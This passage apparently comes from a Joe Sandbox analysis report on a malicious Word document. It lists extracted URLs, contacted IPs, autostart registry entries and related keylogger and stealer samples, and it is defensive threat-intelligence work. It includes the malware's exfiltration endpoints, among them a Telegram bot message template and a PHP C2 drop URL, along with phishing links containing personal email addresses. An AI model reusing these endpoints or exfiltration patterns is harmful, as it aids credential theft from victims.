                                                                                          http://checkip.dyndns.org/qjphwmyiA.pif, 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://reallyfreegeoip.org/xml/8.46.123.189$jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.0000000022893000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000228C7000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.000000002284D000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.000000002289D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://reallyfreegeoip.orgjphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.0000000022893000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000228C7000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.000000002289D000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000227E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namejphwmyiA.pif, 0000000A.00000002.3759975786.0000000021121000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C1D1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000227E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=jphwmyiA.pif, 0000000A.00000003.3668623512.00000000223F4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3760427867.000000001D4A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3761096680.0000000023AB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://ocsp.sectigo.com0Cbrightness.exe, 00000007.00000003.2123881485.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163696494.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2160861366.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000003.2246113616.0000000000872000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2285949011.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020664000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.000000000084E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20ajphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000228C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedjphwmyiA.pif, 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.pmail.com0brightness.exe, 00000007.00000003.2123550803.000000007F3EF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2161107303.0000000021426000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2161329052.00000000214AA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2123881485.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163281507.0000000021700000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163696494.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2128046542.000000007F3AA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2162496281.00000000215F2000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, jphwmyiA.pif.7.drfalse
                                                                                                            		high
                                                                                                            https://reallyfreegeoip.org/xml/jphwmyiA.pif, 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021170000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C221000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000227E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high

                                                                                                              World Map of Contacted IPs

                                                                                                              • No. of IPs < 25%
                                                                                                              • 25% < No. of IPs < 50%
                                                                                                              • 50% < No. of IPs < 75%
                                                                                                              • 75% < No. of IPs

                                                                                                              Public IPs

                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                              132.226.8.169
                                                                                                              		checkip.dyndns.comUnited States
                                                                                                              		16989UTMEMUSfalse
                                                                                                              166.62.27.188
                                                                                                              		amazonenviro.comUnited States
                                                                                                              		26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                                                                              208.91.198.176
                                                                                                              		mail.techniqueqatar.comUnited States
                                                                                                              		394695PUBLIC-DOMAIN-REGISTRYUStrue
                                                                                                              149.154.167.220
                                                                                                              		api.telegram.orgUnited Kingdom
                                                                                                              		62041TELEGRAMRUfalse
                                                                                                              188.114.97.3
                                                                                                              		reallyfreegeoip.orgEuropean Union
                                                                                                              		13335CLOUDFLARENETUSfalse
                                                                                                              147.124.216.113
                                                                                                              		unknownUnited States
                                                                                                              		1432AC-AS-1USfalse

                                                                                                              General Information

                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                              Analysis ID:1584675
                                                                                                              Start date and time:2025-01-06 07:53:07 +01:00
                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                              Overall analysis duration:0h 11m 33s
                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                              Report type:full
                                                                                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                              Number of analysed new started processes analysed:21
                                                                                                              Number of new started drivers analysed:0
                                                                                                              Number of existing processes analysed:0
                                                                                                              Number of existing drivers analysed:0
                                                                                                              Number of injected processes analysed:0
                                                                                                              Technologies:
                                                                                                              • HCA enabled
                                                                                                              • EGA enabled
                                                                                                              • GSI enabled (VBA)
                                                                                                              • AMSI enabled
                                                                                                              Analysis Mode:default
                                                                                                              Analysis stop reason:Timeout
                                                                                                              Sample name:ITT # KRPBV2663 .doc
                                                                                                              Detection:MAL
                                                                                                              Classification:mal100.troj.spyw.expl.evad.winDOC@24/10@5/6
                                                                                                              EGA Information:
                                                                                                              • Successful, ratio: 100%
                                                                                                              HCA Information:
                                                                                                              • Successful, ratio: 98%
                                                                                                              • Number of executed functions: 148
                                                                                                              • Number of non-executed functions: 120
                                                                                                              Cookbook Comments:
                                                                                                              • Found application associated with file extension: .doc
                                                                                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                              • Attach to Office via COM
                                                                                                              • Scroll down
                                                                                                              • Close Viewer
                                                                                                              • Override analysis time to 79249.1381 for current running targets taking high CPU consumption

                                                                                                              Warnings

                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                              • Excluded IPs from analysis (whitelisted): 52.109.32.97, 52.113.194.132, 23.56.254.164, 20.50.201.204, 52.111.231.25, 52.111.231.23, 52.111.231.26, 52.111.231.24, 2.21.65.149, 2.21.65.130, 52.109.89.19, 23.200.88.61, 23.200.88.73, 88.221.110.227, 88.221.110.138, 40.126.31.73, 20.109.210.53, 23.1.237.91, 13.107.246.45
                                                                                                              • Excluded domains from analysis (whitelisted): binaries.templates.cdn.office.net.edgesuite.net, slscr.update.microsoft.com, templatesmetadata.office.net.edgekey.net, weu-azsc-000.roaming.officeapps.live.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, eur.roaming1.live.com.akadns.net, a1847.dscg2.akamai.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, templatesmetadata.office.net, ukw-azsc-config.officeapps.live.com, prod.fs.microsoft.com.akadns.net, www.bing.com, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, prod1.naturallanguageeditorservice.osi.office.n
                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                              Simulations

                                                                                                              Behavior and APIs

                                                                                                              TimeTypeDescription
                                                                                                              01:54:03API Interceptor2x Sleep call for process: brightness.exe modified
                                                                                                              01:54:13API Interceptor2378888x Sleep call for process: jphwmyiA.pif modified
                                                                                                              01:54:18API Interceptor4x Sleep call for process: Aiymwhpj.PIF modified
                                                                                                              07:54:09AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Aiymwhpj C:\Users\Public\Aiymwhpj.url
                                                                                                              07:54:17AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Aiymwhpj C:\Users\Public\Aiymwhpj.url

                                                                                                              Joe Sandbox View / Context

                                                                                                              IPs

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              132.226.8.169kP8EgMorTr.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              PARATRANSFARI REMINDER.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              0001.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              PK241200518-EMAIL RELEASE-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              CITAS_pif.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              208.91.198.176image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                grace.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  RTGS-WB-ABS-240730-NEW.lnkGet hashmaliciousAgentTeslaBrowse
                                                                                                                    166.62.27.188PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse

                                                                                                                      Domains

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      reallyfreegeoip.orgPI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      kP8EgMorTr.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      PO#5_Tower_049.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      W2k2NLSvja.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      FACT0987789000900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 104.21.67.152
                                                                                                                      file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      PO_4027_from_IC_Tech_Inc_6908.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      amazonenviro.comPI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 166.62.27.188
                                                                                                                      api.telegram.orgPI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      kP8EgMorTr.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=vyczmuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#changyeol.choi@hyundaielevator.comGet hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=rmgfuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#kh.jang@hyundaimovex.comGet hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=olgelfuabFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#kh.jang@hyundaimovex.comGet hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      https://telegra.ph/Clarkson-122025-01-02Get hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      W2k2NLSvja.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      FACT0987789000900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      DHL DOC INV 191224.gz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      mail.techniqueqatar.comimage.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 208.91.198.176
                                                                                                                      checkip.dyndns.comPI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 158.101.44.242
                                                                                                                      kP8EgMorTr.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 132.226.8.169
                                                                                                                      PO#5_Tower_049.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 158.101.44.242
                                                                                                                      W2k2NLSvja.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 132.226.247.73
                                                                                                                      FACT0987789000900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 132.226.247.73
                                                                                                                      PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 132.226.8.169
                                                                                                                      file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 132.226.247.73
                                                                                                                      file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 193.122.130.0
                                                                                                                      file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 158.101.44.242
                                                                                                                      PO_4027_from_IC_Tech_Inc_6908.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                      • 158.101.44.242

                                                                                                                      ASNs

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      TELEGRAMRUPI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      kP8EgMorTr.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=vyczmuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#changyeol.choi@hyundaielevator.comGet hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=rmgfuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#kh.jang@hyundaimovex.comGet hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=olgelfuabFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#kh.jang@hyundaimovex.comGet hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      ZT0KQ1PC.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                                                                                      • 149.154.167.99
                                                                                                                      RisingStrip.exeGet hashmaliciousVidarBrowse
                                                                                                                      • 149.154.167.99
                                                                                                                      https://telegra.ph/Clarkson-122025-01-02Get hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      W2k2NLSvja.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      FACT0987789000900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      PUBLIC-DOMAIN-REGISTRYUShttp://www.technoafriwave.rwGet hashmaliciousUnknownBrowse
                                                                                                                      • 207.174.214.183
                                                                                                                      W2k2NLSvja.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 208.91.199.115
                                                                                                                      image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 208.91.198.176
                                                                                                                      YinLHGpoX4.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                      • 103.53.42.63
                                                                                                                      v4BET4inNV.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                      • 103.53.42.63
                                                                                                                      InvoiceNr274728.pdf.lnkGet hashmaliciousLummaCBrowse
                                                                                                                      • 208.91.198.106
                                                                                                                      Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 119.18.54.39
                                                                                                                      List of required items and services pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                      • 103.53.42.63
                                                                                                                      s0zqlmETpm.lnkGet hashmaliciousUnknownBrowse
                                                                                                                      • 216.10.240.70
                                                                                                                      Quote_8714.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 199.79.62.115
                                                                                                                      UTMEMUSkP8EgMorTr.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 132.226.8.169
                                                                                                                      armv5l.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 132.244.2.45
                                                                                                                      31.13.224.14-x86-2025-01-03T22_14_18.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 132.226.42.231
                                                                                                                      W2k2NLSvja.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 132.226.247.73
                                                                                                                      FACT0987789000900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 132.226.247.73
                                                                                                                      PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 132.226.8.169
                                                                                                                      file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 132.226.247.73
                                                                                                                      DEMONS.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 132.226.227.252
                                                                                                                      PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 132.226.8.169
                                                                                                                      Requested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 132.226.247.73
                                                                                                                      AS-26496-GO-DADDY-COM-LLCUSPI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 166.62.27.188
                                                                                                                      fuckunix.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 50.62.7.191
                                                                                                                      Josho.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 72.167.237.175
                                                                                                                      DRlFlg7OV8.lnkGet hashmaliciousUnknownBrowse
                                                                                                                      • 166.62.28.147
                                                                                                                      arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                      • 192.169.229.195
                                                                                                                      db0fa4b8db0333367e9bda3ab68b8042.i686.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                      • 148.72.251.75
                                                                                                                      https://chamberoflearning.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU1uZ3phbkk9JnVpZD1VU0VSMTcxMjIwMjRVNTkxMjE3Mjk=N0123NCA_A8_CHF@emfa.ptGet hashmaliciousUnknownBrowse
                                                                                                                      • 216.69.174.68
                                                                                                                      https://www.gglusa.us/Get hashmaliciousUnknownBrowse
                                                                                                                      • 68.178.157.109
                                                                                                                      armv7l.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 192.186.210.173
                                                                                                                      armv6l.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 68.178.185.215

                                                                                                                      JA3 Fingerprints

